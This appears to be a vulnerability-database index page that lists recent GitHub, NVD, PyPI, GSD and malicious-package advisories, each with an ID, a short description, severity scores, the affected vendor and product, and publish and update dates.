Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
ghsa-3grp-7h7h-xcr6 (github) Authorization Bypass Through User-Controlled Key, CWE - 862 - Missing Authorization, – Improper A... 2025-09-19T15:31:09Z 2025-09-30T15:30:28Z
ghsa-8h48-6654-j9p6 (github) Zohocorp ManageEngine Applications Manager versions 176600 and prior are vulnerable to stored cro... 2025-07-23T12:30:25Z 2025-09-30T15:30:27Z
ghsa-w8qp-5q95-q255 (github) A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Magelis ... 2022-05-24T16:56:25Z 2025-09-30T15:30:26Z
ghsa-qrg2-552m-g38p (github) The Treck TCP/IP stack before 6.0.1.66 has an ICMPv4 Out-of-bounds Read. 2022-05-24T17:20:45Z 2025-09-30T15:30:26Z
ghsa-f526-vg2h-46f3 (github) A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0. It ha... 2024-03-22T00:31:14Z 2025-09-30T15:30:26Z
ghsa-53cj-vhvg-mmqf (github) An issue was discovered in Treck IPv6 before 6.0.1.68. Improper input validation in the IPv6 comp... 2022-05-24T17:37:05Z 2025-09-30T15:30:26Z
ghsa-3wmc-fg6p-fq4v (github) The Treck TCP/IP stack before 6.0.1.66 has an Integer Overflow during Memory Allocation that caus... 2022-05-24T17:20:44Z 2025-09-30T15:30:26Z
ghsa-prj3-ccx8-p6x4 (github) Netty affected by MadeYouReset HTTP/2 DDoS vulnerability 2025-08-13T19:06:56Z 2025-09-30T15:24:23Z
ghsa-w64r-2g3w-w8w4 (github) Coder AgentAPI exposed user chat history via a DNS rebinding attack 2025-09-29T20:40:26Z 2025-09-30T15:16:20Z
ghsa-g99p-47x7-mq88 (github) go-f3 module vulnerable to integer overflow leading to panic 2025-09-29T20:40:08Z 2025-09-30T15:16:09Z
ghsa-7pq9-rf9p-wcrf (github) go-f3 Vulnerable to Cached Justification Verification Bypass 2025-09-29T20:40:02Z 2025-09-30T15:16:03Z
ghsa-v39m-5m9j-m9w9 (github) mkdocs-include-markdown-plugin susceptible to unvalidated input colliding with substitution placeholders 2025-09-29T16:29:07Z 2025-09-30T15:15:20Z
ghsa-wpwj-69cm-q9c5 (github) go-mail has insufficient address encoding when passing mail addresses to the SMTP client 2025-09-29T16:28:58Z 2025-09-30T15:15:13Z
ghsa-6q9c-m9fr-865m (github) vet MCP Server SSE Transport DNS Rebinding Vulnerability 2025-09-29T16:28:49Z 2025-09-30T15:15:06Z
ghsa-h7rh-xfpj-hpcm (github) MinIO Java Client XML Tag Value Substitution Vulnerability 2025-09-29T17:53:31Z 2025-09-30T15:14:27Z
ghsa-vqfh-5rpf-pw2x (github) The Chat by Chatwee plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versi... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-mjmg-pjmq-g329 (github) The AffiliateWP plugin for WordPress is vulnerable to SQL Injection via the ajax_get_affiliate_id... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-h5cc-59xq-vwf6 (github) The LockerPress – WordPress Security Plugin plugin for WordPress is vulnerable to Cross-Site Requ... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-ff8r-v524-64q2 (github) The Tiny Bootstrap Elements Light plugin for WordPress is vulnerable to Local File Inclusion in a... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-5xgr-pv6r-3wh3 (github) The Yoga Schedule Momoyoga plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-42x6-84fc-386q (github) The Post By Email plugin for WordPress is vulnerable to arbitrary file uploads due to missing fil... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-38r4-7v7q-xjh5 (github) The Bei Fen – WordPress Backup Plugin plugin for WordPress is vulnerable to Local File Inclusion ... 2025-09-30T12:30:53Z 2025-09-30T12:30:53Z
ghsa-xrx7-7p6r-q95g (github) The LatePoint plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-xphg-w288-5vjw (github) PAD CMS implements weak client-side brute-force protection by utilizing two cookies:  login_count... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-x8gc-2rvv-f7m2 (github) Rejected reason: Not used 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-wxv4-h2hm-q482 (github) Rejected reason: Not used 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-wrw5-6664-q27v (github) The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulne... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-v536-8hrh-rxx4 (github) The Copypress Rest API plugin for WordPress is vulnerable to Remote Code Execution via copyreap_h... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-r9r9-8rf7-6x84 (github) The All in One Music Player plugin for WordPress is vulnerable to Path Traversal in all versions ... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ghsa-r4q2-rhhv-jwfm (github) The WeedMaps Menu for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting... 2025-09-30T12:30:52Z 2025-09-30T12:30:52Z
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2020-27336 (NVD) An issue was discovered in Treck IPv6 before 6.0.1.68. Improper input validation in the IPv6 component when handling a packet sent by an unauthenticated remote attacker could result in an out-of-bounds read of up to three bytes via network access. n/a
n/a
2020-12-22T21:04:08.000Z 2025-09-30T15:52:30.900Z
cve-2020-11909 (NVD) N/A The Treck TCP/IP stack before 6.0.1.66 has an IPv4 Integer Underflow. n/a
n/a
2020-06-17T10:51:09.000Z 2025-09-30T15:52:16.737Z
cve-2025-57852 (NVD) CVSS-v3.1: 5.2 Openshift-ai: privilege escalation via excessive /etc/passwd permissions Red Hat
Red Hat
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift AI (RHOAI)
2025-09-30T14:37:10.024Z 2025-09-30T15:52:02.044Z
cve-2020-27337 (NVD) An issue was discovered in Treck IPv6 before 6.0.1.68. Improper Input Validation in the IPv6 component allows an unauthenticated remote attacker to cause an Out of Bounds Write, and possibly a Denial of Service via network access. n/a
n/a
2020-12-22T21:04:11.000Z 2025-09-30T15:50:10.920Z
cve-2020-11910 (NVD) N/A The Treck TCP/IP stack before 6.0.1.66 has an ICMPv4 Out-of-bounds Read. n/a
n/a
2020-06-17T10:52:48.000Z 2025-09-30T15:49:44.342Z
cve-2025-59668 (NVD) CVSS-v3.0: 7.5 CVSS-v4.0: 8.7 Multiple versions of Central Monitor CNS-6201 contain a NULL pointer dereference vulnerability. When processing a crafted certain UDP packet, the affected device may abnormally terminate. NIHON KOHDEN CORPORATION
Central Monitor CNS-6201
2025-09-30T04:06:11.279Z 2025-09-30T15:46:39.862Z
cve-2025-1396 (NVD) CVSS-v3.1: 3.7 Username Enumeration in Multiple WSO2 Products with Multi-Attribute Login Enabled WSO2
WSO2
WSO2
WSO2 Identity Server
WSO2 Open Banking IAM
WSO2 Identity Server as Key Manager
2025-09-26T07:52:52.297Z 2025-09-30T15:43:31.106Z
cve-2025-59011 (NVD) CVSS-v3.1: 7.5 WordPress Traveler Theme < 3.2.3 - Arbitrary Content Deletion Vulnerability shinetheme
Traveler
2025-09-26T08:31:07.930Z 2025-09-30T15:43:13.815Z
cve-2025-56572 (NVD) N/A An issue in finance.js v.4.1.0 allows a remote attacker to cause a denial of service via the seekZero() parameter. n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T15:43:03.728Z
cve-2025-59010 (NVD) CVSS-v3.1: 7.5 WordPress Permalink Manager Lite Plugin <= 2.5.1.3 - Sensitive Data Exposure Vulnerability Maciej Bis
Permalink Manager Lite
2025-09-26T08:31:08.621Z 2025-09-30T15:42:54.069Z
cve-2025-41245 (NVD) CVSS-v3.1: 4.9 VMSA-2025-0015: VMware Aria Operations and VMware Tools updates address multiple vulnerabilities (CVE-2025-41244,CVE-2025-41245, CVE-2025-41246) VMware
VMware
VMware
VMware
VMware Aria Operations
VMware Cloud Foundation
VMware Telco Cloud Platform
VMware Telco Cloud Infrastructure
2025-09-29T16:19:15.836Z 2025-09-30T15:42:32.121Z
cve-2025-56571 (NVD) N/A Finance.js v4.1.0 contains a Denial of Service (DoS) vulnerability via the IRR function’s depth parameter. Improper handling of the recursion/iteration limit can lead to excessive CPU usage, causing application stalls or crashes. n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T15:42:18.355Z
cve-2025-11163 (NVD) SmartCrawl SEO checker, analyzer & optimizer <= 3.14.3 - Missing Authorization to Plugin Settings Update wpmudev
SmartCrawl SEO checker, analyzer & optimizer
2025-09-30T05:28:53.152Z 2025-09-30T15:41:18.658Z
cve-2025-7052 (NVD) LatePoint <= 5.1.94 - Cross-Site Request Forgery to Account Takeover via change_password() Function latepoint
LatePoint – Calendar Booking Plugin for Appointments and Events
2025-09-30T04:27:07.926Z 2025-09-30T15:40:47.928Z
cve-2025-56018 (NVD) N/A SourceCodester Web-based Pharmacy Product Management System V1.0 is vulnerable to Cross Site Scripting (XSS) in Category Management via the category name field. n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T15:40:40.026Z
cve-2025-7038 (NVD) LatePoint <= 5.1.94 - Unauthenticated Authentication Bypass via load_step Function latepoint
LatePoint – Calendar Booking Plugin for Appointments and Events
2025-09-30T04:27:07.535Z 2025-09-30T15:40:19.475Z
cve-2025-6941 (NVD) LatePoint <= 5.1.94 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode latepoint
LatePoint – Calendar Booking Plugin for Appointments and Events
2025-09-30T04:27:07.055Z 2025-09-30T15:39:46.996Z
cve-2025-6815 (NVD) LatePoint <= 5.1.94 - Authenticated (Administrator+) Stored Cross-Site Scripting latepoint
LatePoint – Calendar Booking Plugin for Appointments and Events
2025-09-30T04:27:06.415Z 2025-09-30T15:39:14.032Z
cve-2025-8777 (NVD) planetcalc <= 2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via language Parameter planetcalc
planetcalc
2025-09-30T03:35:34.141Z 2025-09-30T15:38:26.743Z
cve-2025-10128 (NVD) Eulerpool Research Systems <= 4.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting michaellow
Eulerpool Research Systems
2025-09-30T03:35:32.618Z 2025-09-30T15:37:41.439Z
cve-2025-8608 (NVD) Mihdan: Elementor Yandex Maps <= 1.6.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via Marker Pins mihdan
Mihdan: Elementor Yandex Maps
2025-09-30T03:35:32.244Z 2025-09-30T15:36:49.865Z
cve-2025-10189 (NVD) BP Direct Menus <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting mrwulf
BP Direct Menus
2025-09-30T03:35:31.851Z 2025-09-30T15:36:06.187Z
cve-2025-9991 (NVD) Tiny Bootstrap Elements Light <= 4.3.34 - Unauthenticated Local File Inclusion migli
Tiny Bootstrap Elements Light
2025-09-30T03:35:31.476Z 2025-09-30T15:35:21.042Z
cve-2025-11178 (NVD) CVSS-v3.0: 7.3 Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis True Image (Windows) before build 42386. Acronis
Acronis True Image
2025-09-30T14:52:20.711Z 2025-09-30T15:34:57.863Z
cve-2025-7779 (NVD) CVSS-v3.0: 8.8 Local privilege escalation due to insecure XPC service configuration. The following products are affected: Acronis True Image (macOS) before build 42389, Acronis True Image for SanDisk (macOS) before build 42198, Acronis True Image for Western Digital (macOS) before build 42197. Acronis
Acronis
Acronis
Acronis True Image
Acronis True Image for SanDisk
Acronis True Image for Western Digital
2025-09-30T14:52:46.494Z 2025-09-30T15:34:50.728Z
cve-2025-10168 (NVD) Any News Ticker <= 3.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting mucasoft
Any News Ticker
2025-09-30T03:35:31.054Z 2025-09-30T15:33:06.448Z
cve-2025-9948 (NVD) Chat by Chatwee <= 2.1.3 - Cross-Site Request Forgery to Settings Update paulq
Chat by Chatwee
2025-09-30T03:35:30.655Z 2025-09-30T15:32:03.468Z
cve-2025-10182 (NVD) dbview <= 0.5.5 - Authenticated (Contributor+) Stored Cross-Site Scripting john-ackers
dbview
2025-09-30T03:35:30.092Z 2025-09-30T15:31:35.693Z
cve-2025-8559 (NVD) All in One Music Player <= 1.3.1 - Authenticated (Contributor+) Path Traversal via theme Parameter sanzeeb3
All in One Music Player
2025-09-30T03:35:29.725Z 2025-09-30T15:30:55.175Z
cve-2025-56676 (NVD) N/A TitanSystems Zender v3.9.7 contains an account takeover vulnerability in its password reset functionality. A temporary password or reset token issued to one user can be used to log in as another user, due to improper validation of token-user linkage. This allows remote attackers to gain unauthorized access to any user account by exploiting the password reset mechanism. The vulnerability occurs because the reset token is not correctly bound to the requesting account and is accepted for other user emails during login, enabling privilege escalation and information disclosure. n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T15:30:54.381Z
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2024-36024 (NVD) N/A drm/amd/display: Disable idle reallow as part of command/gpint execution Linux
Linux
Linux
Linux
2024-05-30T15:04:01.114Z 2025-07-11T17:19:43.927Z
cve-2024-36021 (NVD) N/A net: hns3: fix kernel crash when devlink reload during pf initialization Linux
Linux
Linux
Linux
2024-05-30T14:59:45.757Z 2025-05-04T09:10:44.480Z
cve-2025-7493 (NVD) CVSS-v3.1: 9.1 Freeipa: idm: privilege escalation from host to domain admin in freeipa Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat
Red Hat Enterprise Linux 10
Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions
Red Hat Enterprise Linux 9.4 Extended Update Support
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
2025-09-30T15:06:46.836Z 2025-09-30T17:01:36.196Z
cve-2025-56520 (NVD) N/A Dify v1.6.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi. A different vulnerability than CVE-2025-29720. n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T17:07:19.135Z
cve-2025-56207 (NVD) N/A A security flaw in the '_transfer' function of a smart contract implementation for Money Making Opportunity (MMO), an Ethereum ERC721 Non-Fungible Token (NFT) project, allows users or attackers to transfer NFTs to the zero address, leading to permanent asset loss and non-compliance with the ERC721 standard. The eth address is 0x41d3d86a84c8507a7bc14f2491ec4d188fa944e7, contract name is MoneyMakingOpportunity, and compiler version is v0.8.17+commit.8df45f5f. n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T16:41:21.327Z
cve-2025-54476 (NVD) CVSS-v4.0: 4.8 Joomla! Core - [20250901] Inadequate content filtering within the checkAttribute filter code Joomla! Project
Joomla! CMS
2025-09-30T16:02:38.757Z 2025-09-30T17:12:24.696Z
cve-2024-36018 (NVD) N/A nouveau/uvmm: fix addr/range calcs for remap operations Linux
Linux
Linux
Linux
2024-05-30T14:59:42.091Z 2025-05-04T09:10:41.008Z
cve-2025-20352 (NVD) A vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow the following: An authenticated, remote attacker with low privileges could cause a denial of service (DoS) condition on an affected device that is running Cisco IOS Software or Cisco IOS XE Software. To cause the DoS, the attacker must have the SNMPv2c or earlier read-only community string or valid SNMPv3 user credentials. An authenticated, remote attacker with high privileges could execute code as the root user on an affected device that is running Cisco IOS XE Software. To execute code as the root user, the attacker must have the SNMPv1 or v2c read-only community string or valid SNMPv3 user credentials and administrative or privilege 15 credentials on the affected device. An attacker could exploit this vulnerability by sending a crafted SNMP packet to an affected device over IPv4 or IPv6 networks. This vulnerability is due to a stack overflow condition in the SNMP subsystem of the affected software. A successful exploit could allow a low-privileged attacker to cause the affected system to reload, resulting in a DoS condition, or allow a high-privileged attacker to execute arbitrary code as the root user and obtain full control of the affected system. Note: This vulnerability affects all versions of SNMP. Cisco
Cisco
Cisco
IOS
Cisco IOS XE Software
Cisco IOS XE Catalyst SD-WAN
2025-09-24T17:10:42.891Z 2025-09-30T16:18:05.082Z
cve-2025-43400 (NVD) N/A An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Sonoma 14.8.1, macOS Tahoe 26.0.1, macOS Sequoia 15.7.1, visionOS 26.0.1, iOS 26.0.1 and iPadOS 26.0.1, iOS 18.7.1 and iPadOS 18.7.1. Processing a maliciously crafted font may lead to unexpected app termination or corrupt process memory. Apple
Apple
Apple
Apple
Apple
Apple
macOS
macOS
visionOS
iOS and iPadOS
macOS
iOS and iPadOS
2025-09-29T18:03:35.300Z 2025-09-29T18:49:22.368Z
cve-2024-10241 (NVD) CVSS-v3.1: 4.3 Private channel names leaked with Ctrl+K when ElasticSearch is enabled Mattermost
Mattermost
2024-10-29T08:08:20.873Z 2024-10-29T12:52:53.569Z
cve-2025-23798 (NVD) CVSS-v3.1: 7.1 WordPress Mass Messaging in BuddyPress Plugin <= 2.2.1 - Reflected Cross Site Scripting (XSS) vulnerability Eliott Robson
Mass Messaging in BuddyPress
2025-01-22T14:29:22.024Z 2025-08-26T19:35:18.699Z
cve-2025-26876 (NVD) CVSS-v3.1: 6.8 WordPress Search with Typesense Plugin <= 2.0.8 - Path Traversal vulnerability CodeManas
Search with Typesense
2025-02-25T14:17:51.077Z 2025-08-26T19:33:58.109Z
cve-2025-26877 (NVD) CVSS-v3.1: 6.5 WordPress Front End Users Plugin <= 3.2.30 - Cross Site Scripting (XSS) vulnerability Rustaurius
Front End Users
2025-02-25T14:17:51.241Z 2025-08-26T19:32:51.029Z
cve-2025-28168 (NVD) The Multiple File Upload add-on component 3.1.0 for OutSystems is vulnerable to Unrestricted File Upload. This occurs because file extension and size validations are enforced solely on the client side. An attacker can intercept the upload request and modify a parameter to bypass extension restrictions and upload arbitrary files. NOTE: this is a third-party component that is not supplied or supported by OutSystems. Multi Uploaders
Multiple File Upload
2025-05-05T00:00:00.000Z 2025-08-26T19:27:57.951Z
cve-2025-29088 (NVD) In SQLite 3.49.0 before 3.49.1, certain argument values to sqlite3_db_config (in the C-language API) can cause a denial of service (application crash). An sz*nBig multiplication is not cast to a 64-bit integer, and consequently some memory allocations may be incorrect. SQLite
SQLite
2025-04-10T00:00:00.000Z 2025-08-26T19:27:20.720Z
cve-2024-1587 (NVD) The Newsmatic theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.0 via the 'newsmatic_filter_posts_load_tab_content'. This makes it possible for unauthenticated attackers to view draft posts and post content. blazethemes
Newsmatic
2024-04-09T18:59:18.626Z 2025-08-26T20:08:09.716Z
cve-2024-1714 (NVD) CVSS-v3.1: 7.1 Access Request for Entitlement Values with Leading/Trailing Whitespace SailPoint
IdentityIQ
2024-02-21T16:57:19.298Z 2025-08-26T20:08:09.865Z
cve-2024-20332 (NVD) A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a server-side request forgery (SSRF) attack through an affected device. This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device. To successfully exploit this vulnerability, the attacker would need valid Super Admin credentials. Cisco
Cisco Identity Services Engine Software
2024-04-03T16:22:02.111Z 2025-08-26T20:08:10.020Z
cve-2024-20345 (NVD) A vulnerability in the file upload functionality of Cisco AppDynamics Controller could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to access sensitive data on an affected device. Cisco
Cisco AppDynamics
2024-03-06T16:33:48.826Z 2025-08-26T20:08:10.239Z
cve-2024-23968 (NVD) CVSS-v3.1: 8.8 ChargePoint Home Flex SrvrToSmSetAutoChnlListMsg Stack-based Buffer Overflow ChargePoint
Home Flex
2025-01-30T23:31:40.396Z 2025-08-26T21:01:52.095Z
cve-2024-23969 (NVD) CVSS-v3.1: 8.8 ChargePoint Home Flex wlanchnllst Out-Of-Bounds Write ChargePoint
Home Flex
2025-01-30T23:37:22.462Z 2025-08-26T21:02:16.174Z
cve-2024-23970 (NVD) CVSS-v3.1: 6.5 ChargePoint Home Flex Improper Certificate Validation ChargePoint
Home Flex
2025-01-30T23:40:49.963Z 2025-08-26T21:02:52.773Z
cve-2024-23971 (NVD) CVSS-v3.1: 8.8 ChargePoint Home Flex OCPP bswitch Command Injection ChargePoint
Home Flex
2025-01-30T23:42:57.796Z 2025-08-26T21:08:23.253Z
cve-2024-23973 (NVD) CVSS-v3.1: 8.8 Silicon Labs Gecko OS HTTP GET Request Handling Stack-based Buffer Overflow Silicon Labs
Gecko OS
2025-01-30T23:28:55.542Z 2025-08-26T21:08:23.396Z
cve-2025-5062 (NVD) WooCommerce <= 9.4.2 - PostMessage-Based Cross-Site Scripting automattic
WooCommerce
2025-05-22T03:42:08.044Z 2025-05-22T13:31:43.045Z
cve-2024-9082 (NVD) SourceCodester Online Eyewear Shop User Creation Users.php improper authorization SourceCodester
Online Eyewear Shop
2024-09-22T08:00:07.660Z 2025-03-31T05:47:57.208Z
cve-2024-10559 (NVD) SourceCodester Airport Booking Management System details buffer overflow SourceCodester
Airport Booking Management System
2024-10-31T02:00:14.095Z 2025-04-03T10:54:25.610Z
cve-2024-1833 (NVD) SourceCodester Employee Management System login.php sql injection SourceCodester
Employee Management System
2024-02-23T19:31:06.771Z 2025-04-05T06:19:45.237Z
cve-2025-6034 (NVD) CVSS-v3.1: 7.8 CVSS-v4.0: 8.5 Out of Bounds Read in DefaultFontOptions() in NI Circuit Design Suite NI
Circuit Design Suite
2025-09-30T16:07:21.551Z 2025-09-30T17:09:26.111Z
cve-2025-6033 (NVD) CVSS-v3.1: 7.8 CVSS-v4.0: 8.5 Memory Corruption issue in XML_Serialize() in NI Circuit Design Suite NI
Circuit Design Suite
2025-09-30T16:05:53.142Z 2025-09-30T17:10:52.906Z
ID Description Publish Date Update Date
pysec-2025-34 The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_c... 2025-04-24T01:15:49+00:00 2025-04-24T03:08:15.436691+00:00
pysec-2025-33 Vyper is a Pythonic Smart Contract Language for the EVM. When the Vyper Compiler uses the precomp... 2025-01-14T18:16:05+00:00 2025-04-23T21:23:01.322686+00:00
pysec-2025-32 BentoML is a Python library for building online serving systems optimized for AI apps and model i... 2025-04-09T16:15:25+00:00 2025-04-22T19:21:34.073355+00:00
pysec-2025-31 vyper is a Pythonic Smart Contract Language for the EVM. Vyper handles AugAssign statements by fi... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.116292+00:00
pysec-2025-30 vyper is a Pythonic Smart Contract Language for the EVM. Multiple evaluation of a single expressi... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.064106+00:00
pysec-2025-29 vyper is a Pythonic Smart Contract Language for the EVM. Vyper `sqrt()` builtin uses the babyloni... 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.005382+00:00
pysec-2025-28 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.772920+00:00
pysec-2025-27 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.711157+00:00
pysec-2025-26 The Snowflake Connector for Python provides an interface for developing Python applications that ... 2025-01-29T21:15:21+00:00 2025-04-09T17:27:27.645758+00:00
pysec-2021-891 CWE - CWE-287: Improper Authentication vulnerability in SUSE Linux Enterprise Server 15 SP 3; ope... 2021-03-03T10:15:13+00:00 2025-04-09T17:27:27.582884+00:00
pysec-2025-25 Rembg is a tool to remove images background. In Rembg 2.0.57 and earlier, the CORS middleware is ... 2025-03-03T17:15:14+00:00 2025-04-09T17:27:27.532849+00:00
pysec-2025-24 Rembg is a tool to remove images background. In Rembg 2.0.57 and earlier, the /api/remove endpoin... 2025-03-03T17:15:14+00:00 2025-04-09T17:27:27.486485+00:00
pysec-2025-23 Versions of the package ray before 2.43.0 are vulnerable to Insertion of Sensitive Information in... 2025-03-06T05:15:16+00:00 2025-04-09T17:27:27.434099+00:00
pysec-2022-43179 Poetry is a dependency manager for Python. To handle dependencies that come from a Git repository... 2022-09-07T19:15:08+00:00 2025-04-09T17:27:27.255151+00:00
pysec-2025-22 A vulnerability, that could result in Remote Code Execution (RCE), has been found in PlotAI. Lack... 2025-03-10T14:15:24+00:00 2025-04-09T17:27:27.203714+00:00
pysec-2023-311 plone.namedfile allows users to handle `File` and `Image` fields targeting, but not depending on,... 2023-09-21T15:15:10+00:00 2025-04-09T17:27:27.153848+00:00
pysec-2025-21 picklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model archives whe... 2025-03-10T12:15:12+00:00 2025-04-09T17:27:27.016747+00:00
pysec-2025-20 picklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that causes it to cra... 2025-03-10T12:15:10+00:00 2025-04-09T17:27:26.966215+00:00
pysec-2025-19 picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vuln... 2025-03-03T19:15:34+00:00 2025-04-09T17:27:26.916350+00:00
pysec-2025-18 picklescan before 0.0.21 does not treat 'pip' as an unsafe global. An attacker could craft a mali... 2025-02-26T15:15:24+00:00 2025-04-09T17:27:26.867210+00:00
pysec-2023-310 Mobile Security Framework (MobSF) <=v3.7.8 Beta is vulnerable to Insecure Permissions. NOTE: the ... 2023-09-21T22:15:11+00:00 2025-04-09T17:27:26.663665+00:00
pysec-2025-17 In mlflow/mlflow version 2.18, an admin is able to create a new user account without setting a pa... 2025-03-20T10:15:54+00:00 2025-04-09T17:27:26.322333+00:00
pysec-2023-309 Path Traversal in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-13T00:15:07+00:00 2025-04-09T17:27:26.271200+00:00
pysec-2023-308 Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0. 2023-07-19T01:15:10+00:00 2025-04-09T17:27:26.223213+00:00
pysec-2025-16 LNbits is a Lightning wallet and accounts system. A Server-Side Request Forgery (SSRF) vulnerabil... 2025-04-06T20:15:15+00:00 2025-04-09T17:27:25.872691+00:00
pysec-2025-15 Flask-AppBuilder is an application development framework. Prior to 4.5.3, Flask-AppBuilder allows... 2025-03-03T16:15:41+00:00 2025-04-09T17:27:25.227116+00:00
pysec-2025-14 An issue was discovered in Django 5.1 before 5.1.8 and 5.0 before 5.0.14. The NFKC normalization ... 2025-04-02T13:15:44+00:00 2025-04-09T17:27:25.169049+00:00
pysec-2025-13 An issue was discovered in Django 5.1 before 5.1.7, 5.0 before 5.0.13, and 4.2 before 4.2.20. The... 2025-03-06T19:15:27+00:00 2025-04-09T17:27:25.095679+00:00
pysec-2022-43178 An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the cleo PyPI pac... 2022-11-09T20:15:10+00:00 2025-04-09T17:27:24.793038+00:00
pysec-2022-43177 Azure CLI is the command-line interface for Microsoft Azure. In versions previous to 2.40.0, Azur... 2022-10-25T17:15:56+00:00 2025-04-09T17:27:24.642962+00:00
ID Description
gsd-2024-33851 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33850 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33849 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4295 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4294 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4293 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4292 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4291 The format of the source doesn't require a description, click on the link for more details
gsd-2023-52722 The format of the source doesn't require a description, click on the link for more details
gsd-2022-48685 The format of the source doesn't require a description, click on the link for more details
gsd-2022-48684 The format of the source doesn't require a description, click on the link for more details
gsd-2024-24777 The format of the source doesn't require a description, click on the link for more details
gsd-2024-28875 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33846 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33845 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33844 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33843 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33842 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33841 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33840 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33839 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33838 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33837 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33836 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33835 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33834 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33833 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33832 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33831 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33830 The format of the source doesn't require a description, click on the link for more details
ID Description Publish Date Update Date
mal-2024-8863 Malicious code in conductor-utils (npm) 2024-09-11T23:05:31Z 2024-09-11T23:05:32Z
mal-2024-8869 Malicious code in perf-tools (npm) 2024-09-11T23:05:31Z 2024-09-11T23:05:31Z
mal-2024-8867 Malicious code in node-integration-test (npm) 2024-09-11T23:05:31Z 2024-09-11T23:05:31Z
mal-2024-8864 Malicious code in create-auction-house (npm) 2024-09-11T23:05:31Z 2024-09-11T23:05:31Z
